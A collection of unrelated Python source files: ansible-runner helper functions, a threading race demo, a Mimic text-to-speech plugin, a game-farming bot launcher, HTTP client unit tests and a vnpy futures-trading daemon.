snippet=snippet, playbook_dir=playbook_dir, module_path=module_path, **kwargs)
doc_runner_thread = threading.Thread(target=r.run)
doc_runner_thread.start()
return doc_runner_thread, r
def get_plugin_list(list_files=None, response_format=None, plugin_type=None, playbook_dir=None, module_path=None, **kwargs):
'''
Run an ansible-doc command to get list of installed Ansible plugins.
:param list_files: The boolean parameter is set to ``True`` returns file path of the plugin along with the plugin name.
:param response_format: The output format for response. Valid values can be one of ``json`` or ``human`` and the response
is either json string or plain text in human readable foramt. Default value is ``json``.
:param plugin_type: The type of the plugin mentioned in plugins_names. Valid values are ``become``, ``cache``, ``callback``,
``cliconf``, ``connection``, ``httpapi``, ``inventory``, ``lookup``, ``netconf``, ``shell``, ``vars``,
``module``, ``strategy``. If the value is not provided it defaults to ``module``.
:param playbook_dir: This parameter is used to sets the relative path to handle playbook adjacent installed plugins.
:param module_path: This parameter is prepend colon-separated path(s) to module library
(default=~/.ansible/plugins/modules:/usr/share/ansible/plugins/modules).
:param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
:param cwd: The current working directory from which the command in executable_cmd should be be executed.
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param quiet: Disable all output
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param process_isolation: Enable process isolation, using a container engine (e.g. podman).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels. (default: None)
:param container_options: List of container options to pass to execution engine.
:param container_workdir: The working directory within the container.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g...started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:type list_files: bool
:type plugin_type: str
:type response_format: str
:type playbook_dir: str
:type module_path: str
:type runner_mode: str
:type cwd: str
:type envvars: dict
:type passwords: dict
:type settings: dict
:type private_data_dir: str
:type project_dir: str
:type artifact_dir: str
:type fact_cache_type: str
:type fact_cache: str
:type process_isolation: bool
:type process_isolation_executable: str
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type container_workdir: str
:type ident: str
:type rotate_artifacts: int
:type ssh_key: str
:type quiet: bool
:type json_mode: bool
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:returns: Returns a tuple of response and error string. In case if ``runner_mode`` is set to ``pexpect`` the error value is empty as
``pexpect`` uses same output descriptor for stdout and stderr. If the vaue of ``response_format`` is ``json``
it returns a python dictionary object.
'''
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rd = DocConfig(**kwargs)
rd.prepare_plugin_list_command(list_files=list_files, response_format=response_format, plugin_type=plugin_type,
playbook_dir=playbook_dir, module_path=module_path)
r = Runner(rd,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
r.run()
response = r.stdout.read()
error = r.stderr.read()
if response and response_format == 'json':
response = json.loads(santize_json_response(response))
return response, error
def get_inventory(action, inventories, response_format=None, host=None, playbook_dir=None, vault_ids=None, vault_password_file=None, **kwargs):
'''
Run an ansible-inventory command to get inventory related details.
:param action: Valid values are one of ``graph``, ``host``, ``list``
``graph`` create inventory graph, ``host`` returns specific host info and works as inventory script and
``list`` output all hosts info and also works as inventory script.
:param inventories: List of inventory host path.
:param response_format: The output format for response. Valid values can be one of ``json``, ``yaml``, ``toml``.
Default is ``json``. If ``action`` is ``graph`` only allowed value is ``json``.
:param host: When ``action`` is set to ``host`` this parameter is used to get the host specific information.
:param playbook_dir: This parameter is used to sets the relative path for the inventory.
:param vault_ids: The vault identity to use.
:param vault_password_file: The vault password files to use.
:param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
:param cwd: The current working directory from which the command in executable_cmd should be be executed.
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param quiet: Disable all output
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param process_isolation: Enable process isolation, using a container engine (e.g. podman).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels. (default: None)
:param container_options: List of container options to pass to execution engine.
:param container_workdir: The working directory within the container.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g...started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:type action: str
:type inventories: list
:type response_format: str
:type host: str
:type playbook_dir: str
:type vault_ids: str
:type vault_password_file: str
:type runner_mode: str
:type cwd: str
:type envvars: dict
:type passwords: dict
:type settings: dict
:type private_data_dir: str
:type project_dir: str
:type artifact_dir: str
:type fact_cache_type: str
:type fact_cache: str
:type process_isolation: bool
:type process_isolation_executable: str
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type container_workdir: str
:type ident: str
:type rotate_artifacts: int
:type ssh_key: str
:type quiet: bool
:type json_mode: bool
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:returns: Returns a tuple of response and error string. In case if ``runner_mode`` is set to ``pexpect`` the error value is
empty as ``pexpect`` uses same output descriptor for stdout and stderr. If the vaue of ``response_format`` is ``json``
it returns a python dictionary object.
'''
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rd = InventoryConfig(**kwargs)
rd.prepare_inventory_command(action=action, inventories=inventories, response_format=response_format, host=host, playbook_dir=playbook_dir,
vault_ids=vault_ids, vault_password_file=vault_password_file)
r = Runner(rd,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
r.run()
response = r.stdout.read()
error = r.stderr.read()
if response and response_format == 'json':
response = json.loads(santize_json_response(response))
return response, error
def get_ansible_config(action, config_file=None, only_changed=None, **kwargs):
'''
Run an ansible-config command to get ansible configuration releated details.
:param action: Valid values are one of ``list``, ``dump``, ``view``
``list`` returns all config options, ``dump`` returns the active configuration and
``view`` returns the view of configuration file.
:param config_file: Path to configuration file, defaults to first file found in precedence. .
:param only_changed: The boolean value when set to ``True`` returns only the configurations that have changed
from the default. This parameter is applicable only when ``action`` is set to ``dump``.
:param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
:param cwd: The current working directory from which the command in executable_cmd should be be executed.
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from Ansible.
Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param quiet: Disable all output
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param process_isolation: Enable process isolation, using a container engine (e.g. podman).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels. (default: None)
:param container_options: List of container options to pass to execution engine.
:param container_workdir: The working directory within the container.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g...started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:type action: str
:type config_file: str
:type only_changed: bool
:type runner_mode: str
:type cwd: str
:type envvars: dict
:type passwords: dict
:type settings: dict
:type private_data_dir: str
:type project_dir: str
:type artifact_dir: str
:type fact_cache_type: str
:type fact_cache: str
:type process_isolation: bool
:type process_isolation_executable: str
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type container_workdir: str
:type ident: str
:type rotate_artifacts: int
:type ssh_key: str
:type quiet: bool
:type: json_mode: bool
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:returns: Returns a tuple of response and error string. In case if ``runner_mode`` is set to ``pexpect`` the error value is
empty as ``pexpect`` uses same output descriptor for stdout and stderr.
'''
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rd = AnsibleCfgConfig(**kwargs)
rd.prepare_ansible_config_command(action=action, config_file=config_file, only_changed=only_changed)
r = Runner(rd,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
r.run()
response = r.stdout.read()
error = r.stderr.read()
return response, error
|
lock_no.py
|
# -*- coding: utf-8 -*-
import time, threading
balance = 0
def change_it(n):
global balance
balance = balance + n
balance = balance - n
def run_thread(n):
for i in range(100000):
change_it(n)
t1 = threading.Thread(target=run_thread, args=(5, ))
t2 = threading.Thread(target=run_thread, args=(8, ))
t1.start()
t2.start()
t1.join()
t2.join()
print balance
|
mimic_tts.py
|
# # NEON AI (TM) SOFTWARE, Software Development Kit & Application Development System
# # All trademark and other rights reserved by their respective owners
# # Copyright 2008-2021 Neongecko.com Inc.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import stat
import subprocess
from threading import Thread
from time import time, sleep
import os.path
from os.path import exists, join, expanduser
from mycroft import MYCROFT_ROOT_PATH
from mycroft.api import DeviceApi
from neon_core.configuration import Configuration
from mycroft.util.download import download
from mycroft.util.log import LOG
from neon_core.tts import TTS, TTSValidator
config = Configuration.get().get("tts").get("mimic")
data_dir = expanduser(Configuration.get()['data_dir'])
BIN = config.get("path",
os.path.join(MYCROFT_ROOT_PATH, 'mimic', 'bin', 'mimic'))
if not os.path.isfile(BIN):
# Search for mimic on the path
import distutils.spawn
BIN = distutils.spawn.find_executable("mimic")
SUBSCRIBER_VOICES = {'trinity': join(data_dir, 'voices/mimic_tn')}
def download_subscriber_voices(selected_voice):
"""
Function to download all premium voices, starting with
the currently selected if applicable
"""
def make_executable(dest):
""" Call back function to make the downloaded file executable. """
LOG.info('Make executable')
# make executable
st = os.stat(dest)
os.chmod(dest, st.st_mode | stat.S_IEXEC)
# First download the selected voice if needed
voice_file = SUBSCRIBER_VOICES.get(selected_voice)
if voice_file is not None and not exists(voice_file):
LOG.info('voice doesn\'t exist, downloading')
url = DeviceApi().get_subscriber_voice_url(selected_voice)
# Check we got an url
if url:
dl = download(url, voice_file, make_executable)
# Wait for completion
while not dl.done:
sleep(1)
else:
LOG.debug('{} is not available for this architecture'
.format(selected_voice))
# Download the rest of the subsciber voices as needed
for voice in SUBSCRIBER_VOICES:
voice_file = SUBSCRIBER_VOICES[voice]
if not exists(voice_file):
url = DeviceApi().get_subscriber_voice_url(voice)
# Check we got an url
if url:
dl = download(url, voice_file, make_executable)
# Wait for completion
while not dl.done:
sleep(1)
else:
LOG.debug('{} is not available for this architecture'
.format(voice))
class Mimic(TTS):
def __init__(self, lang, config):
super(Mimic, self).__init__(
lang, config, MimicValidator(self), 'wav',
ssml_tags=["speak", "ssml", "phoneme", "voice", "audio", "prosody"]
)
self.dl = None
self.clear_cache()
# Download subscriber voices if needed
self.is_subscriber = DeviceApi().is_subscriber
if self.is_subscriber:
t = Thread(target=download_subscriber_voices, args=[self.voice])
t.daemon = True
t.start()
def modify_tag(self, tag):
for key, value in [
('x-slow', '0.4'),
('slow', '0.7'),
('medium', '1.0'),
('high', '1.3'),
('x-high', '1.6'),
('speed', 'rate')
]:
tag = tag.replace(key, value)
return tag
@property
def args(self):
""" Build mimic arguments. """
if (self.voice in SUBSCRIBER_VOICES and
exists(SUBSCRIBER_VOICES[self.voice]) and self.is_subscriber):
# Use subscriber voice
mimic_bin = SUBSCRIBER_VOICES[self.voice]
voice = self.voice
elif self.voice in SUBSCRIBER_VOICES:
# Premium voice but bin doesn't exist, use ap while downloading
mimic_bin = BIN
voice = 'ap'
else:
# Normal case use normal binary and selected voice
mimic_bin = BIN
voice = self.voice
args = [mimic_bin, '-voice', voice, '-psdur', '-ssml']
stretch = config.get('duration_stretch', None)
if stretch:
args += ['--setf', 'duration_stretch=' + stretch]
return args
def get_tts(self, sentence, wav_file):
# Generate WAV and phonemes
phonemes = subprocess.check_output(self.args + ['-o', wav_file,
'-t', sentence])
return wav_file, phonemes.decode()
def viseme(self, output):
visemes = []
start = time()
pairs = str(output).split(" ")
for pair in pairs:
pho_dur = pair.split(":") # phoneme:duration
if len(pho_dur) == 2:
visemes.append((VISIMES.get(pho_dur[0], '4'),
float(pho_dur[1])))
return visemes
class MimicValidator(TTSValidator):
def __init__(self, tts):
super(MimicValidator, self).__init__(tts)
def validate_lang(self):
# TODO: Verify version of mimic can handle the requested language
pass
def validate_connection(self):
try:
subprocess.call([BIN, '--version'])
except Exception:
LOG.info("Failed to find mimic at: " + BIN)
raise Exception(
'Mimic was not found. Run install-mimic.sh to install it.')
def get_tts_class(self):
return Mimic
# Mapping based on Jeffers phoneme to viseme map, seen in table 1 from:
# http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.221.6377&rep=rep1&type=pdf
#
# Mycroft unit visemes based on images found at:
# http://www.web3.lu/wp-content/uploads/2014/09/visemes.jpg
#
# Mapping was created partially based on the "12 mouth shapes visuals seen at:
# https://wolfpaulus.com/journal/software/lipsynchronization/
VISIMES = {
# /A group
'v': '5',
'f': '5',
# /B group
'uh': '2',
'w': '2',
'uw': '2',
'er': '2',
'r': '2',
'ow': '2',
# /C group
'b': '4',
'p': '4',
'm': '4',
# /D group
'aw': '1',
# /E group
'th': '3',
'dh': '3',
# /F group
'zh': '3',
'ch': '3',
'sh': '3',
'jh': '3',
# /G group
'oy': '6',
'ao': '6',
# /Hgroup
'z': '3',
's': '3',
# /I group
'ae': '0',
'eh': '0',
'ey': '0',
'ah': '0',
'ih': '0',
'y': '0',
'iy': '0',
'aa': '0',
'ay': '0',
'ax': '0',
'hh': '0',
# /J group
'n': '3',
't': '3',
'd': '3',
'l': '3',
# /K group
'g': '3',
'ng': '3',
'k': '3',
# blank mouth
'pau': '4',
}
|
app.py
|
import threading
import time
import schedule
from lokbot.farmer import LokFarmer, TASK_CODE_SILVER_HAMMER, TASK_CODE_GOLD_HAMMER
def find_alliance(farmer: LokFarmer):
while True:
alliance = farmer.api.alliance_recommend().get('alliance')
if alliance.get('numMembers') < alliance.get('maxMembers'):
farmer.api.alliance_join(alliance.get('_id'))
break
time.sleep(60 * 5)
def main(token, captcha_solver_config=None):
if captcha_solver_config is None:
captcha_solver_config = {}
farmer = LokFarmer(token, captcha_solver_config)
threading.Thread(target=farmer.sock_thread).start()
schedule.every(120).to(240).minutes.do(farmer.alliance_helper)
schedule.every(60).to(120).minutes.do(farmer.harvester)
schedule.every(200).to(300).minutes.do(farmer.vip_chest_claim)
schedule.every(120).to(240).minutes.do(farmer.use_resource_in_item_list)
schedule.every(120).to(240).minutes.do(farmer.alliance_farmer)
schedule.run_all()
threading.Thread(target=farmer.free_chest_farmer_thread).start()
threading.Thread(target=farmer.quest_monitor_thread).start()
threading.Thread(target=farmer.building_farmer_thread, args=(TASK_CODE_SILVER_HAMMER,)).start()
threading.Thread(target=farmer.building_farmer_thread, args=(TASK_CODE_GOLD_HAMMER,)).start()
threading.Thread(target=farmer.academy_farmer_thread).start()
while True:
schedule.run_pending()
time.sleep(1)
|
freetests.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
BASEHOST = '127.0.0.1'
BASEPORT = 27600 + random.randint(1,100)
httpclass = httpclient
#import mysolution
#httpclass = mysolution
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
post = None
get = None
def do_POST(self):
try:
if (self.post == None):
return None
else:
return self.post()
except Exception as e:
print("Exception %s\n" % e)
raise e
def do_GET(self):
try:
print("GET %s\n" % self.path)
if (self.get == None):
return None
else:
return self.get()
except Exception as e:
print("Exception %s\n" % e)
raise e
def make_http_server(host = BASEHOST, port = BASEPORT):
return http.server.HTTPServer( (host, port) , MyHTTPHandler)
# always returns 404
def nothing_available(self):
self.send_error(404, "File not found")
self.end_headers()
self.wfile.write(bytes("","utf-8"))
# repeats your path back
def echo_path_get(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("%s\n" % self.path,"utf-8"))
# repeats your post back as json
def echo_post(self):
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(post_data),"utf-8"))
def header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def die_on_method(self):
response = 405
errors = []
errors.append("Method Not Allowed")
if 'Host' not in self.headers:
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def post_header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
if 'Content-length' not in self.headers:
response = 400
errors.append("No Content-Length header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
class TestHTTPClient(unittest.TestCase):
httpd = None
running = False
@classmethod
def setUpClass(self):
'''Cache the httpd server and run it as a thread'''
if (TestHTTPClient.httpd == None):
try:
self.thread = threading.Thread(target=self.run_server).start()
time.sleep(1)
except Exception as e:
print(e)
print("setUP: Thread died")
raise(e)
@classmethod
def run_server(self):
'''run the httpd server in a thread'''
try:
socketserver.TCPServer.allow_reuse_address = True
http.server.HTTPServer.allow_reuse_address = True
TestHTTPClient.httpd = make_http_server()
print("HTTP UP!\n")
TestHTTPClient.httpd.serve_forever()
print("HTTP has been shutdown!\n")
except Exception as e:
print(e)
print("run_server: Thread died")
def test404GET(self):
'''Test against 404 errors'''
MyHTTPHandler.get = nothing_available
http = httpclass.HTTPClient()
req = http.GET("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def test404POST(self):
'''Test against 404 errors'''
MyHTTPHandler.post = nothing_available
http = httpclass.HTTPClient()
req = http.POST("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def testGET(self):
'''Test HTTP GET'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
self.assertTrue(req.body.find(path)>=0, "Data: [%s] " % req.body)
def testGETHeaders(self):
'''Test HTTP GET Headers'''
MyHTTPHandler.get = header_check
MyHTTPHandler.post = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
def testPOSTHeaders(self):
'''Test HTTP POST Headers'''
MyHTTPHandler.post = post_header_check
MyHTTPHandler.get = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.POST( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200,"Code is %s but I wanted a 200 OK" % req.code)
# consider disabling this test until everything else works
def testInternetGets(self):
'''Test HTTP Get in the wild, these webservers are far less
forgiving'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
urls = [
"http://www.cs.ualberta.ca/",
"http://softwareprocess.es/static/SoftwareProcess.es.html",
"http://c2.com/cgi/wiki?CommonLispHyperSpec",
"http://slashdot.org"
]
for url in urls:
try:
req = http.GET( url )
except Exception as e:
print("An Exception was thrown for %s" % url)
self.assertTrue( False, "An Exception was thrown for %s %s" % (url,e))
self.assertTrue(req != None, "None Returned! %s" % url)
self.assertTrue(req.code == 200 or
req.code == 301 or
req.code == 302,
"Code: %s for %s" % (req.code, url))
if (req.code == 200):
self.assertTrue(req.body.find("DOCTYPE")>=0 or
req.body.find("<body")>=0 ,
"%s Data: [%s] " % (url,req.body))
def testPOST(self):
'''Test HTTP POST with an echo server'''
MyHTTPHandler.post = echo_post
http = httpclass.HTTPClient()
path = "post_echoer"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
args = {'a':'aaaaaaaaaaaaa',
'b':'bbbbbbbbbbbbbbbbbbbbbb',
'c':'c',
'd':'012345\r67890\n2321321\n\r'}
print("Sending POST!")
req = http.POST( url, args=args )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
print("Test Post Body: [%s]" % req.body)
outargs = json.loads(req.body)
print(outargs.__class__)
for key in args:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
for key in outargs:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
@classmethod
def tearDownClass(self):
if (TestHTTPClient.httpd!=None):
print("HTTP Shutdown in tearDown\n")
TestHTTPClient.httpd.shutdown()
TestHTTPClient.httpd.server_close()
time.sleep(1)
def test_test_webserver():
print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST,BASEPORT) )
MyHTTPHandler.get = echo_path_get
MyHTTPHandler.post = echo_post
httpd = make_http_server()
try:
httpd.serve_forever()
finally:
httpd.shutdown()
if __name__ == '__main__':
unittest.main()
|
run.py
|
import multiprocessing
import sys
from time import sleep
from datetime import datetime, time
from logging import INFO
from vnpy.event import EventEngine
from vnpy.trader.setting import SETTINGS
from vnpy.trader.engine import MainEngine
from vnpy.gateway.ctp import CtpGateway
from vnpy.app.cta_strategy import CtaStrategyApp
from vnpy.app.cta_strategy.base import EVENT_CTA_LOG
SETTINGS["log.active"] = True
SETTINGS["log.level"] = INFO
SETTINGS["log.console"] = True
ctp_setting = {
"用户名": "",
"密码": "",
"经纪商代码": "",
"交易服务器": "",
"行情服务器": "",
"产品名称": "",
"授权编码": "",
"产品信息": ""
}
# Chinese futures market trading period (day/night)
DAY_START = time(8, 45)
DAY_END = time(14, 29)
NIGHT_START = time(20, 45)
NIGHT_END = time(2, 45)
def check_trading_period():
""""""
current_time = datetime.now().time()
trading = False
if (
(current_time >= DAY_START and current_time <= DAY_END)
or (current_time >= NIGHT_START)
or (current_time <= NIGHT_END)
):
trading = True
return trading
def run_child():
"""
Running in the child process.
"""
SETTINGS["log.file"] = True
event_engine = EventEngine()
main_engine = MainEngine(event_engine)
main_engine.add_gateway(CtpGateway)
cta_engine = main_engine.add_app(CtaStrategyApp)
main_engine.write_log("主引擎创建成功")
log_engine = main_engine.get_engine("log")
event_engine.register(EVENT_CTA_LOG, log_engine.process_log_event)
main_engine.write_log("注册日志事件监听")
main_engine.connect(ctp_setting, "CTP")
main_engine.write_log("连接CTP接口")
sleep(10)
cta_engine.init_engine()
main_engine.write_log("CTA策略初始化完成")
cta_engine.init_all_strategies()
sleep(60) # Leave enough time to complete strategy initialization
main_engine.write_log("CTA策略全部初始化")
cta_engine.start_all_strategies()
main_engine.write_log("CTA策略全部启动")
while True:
sleep(10)
trading = check_trading_period()
if not trading:
print("关闭子进程")
main_engine.close()
sys.exit(0)
def run_parent():
"""
Running in the parent process.
"""
print("启动CTA策略守护父进程")
child_process = None
while True:
trading = check_trading_period()
# Start child process in trading period
if trading and child_process is None:
print("启动子进程")
child_process = multiprocessing.Process(target=run_child)
child_process.start()
print("子进程启动成功")
# 非记录时间则退出子进程
if not trading and child_process is not None:
if not child_process.is_alive():
child_process = None
print("子进程关闭成功")
sleep(5)
if __name__ == "__main__":
run_parent()
|
process_replay.py
|
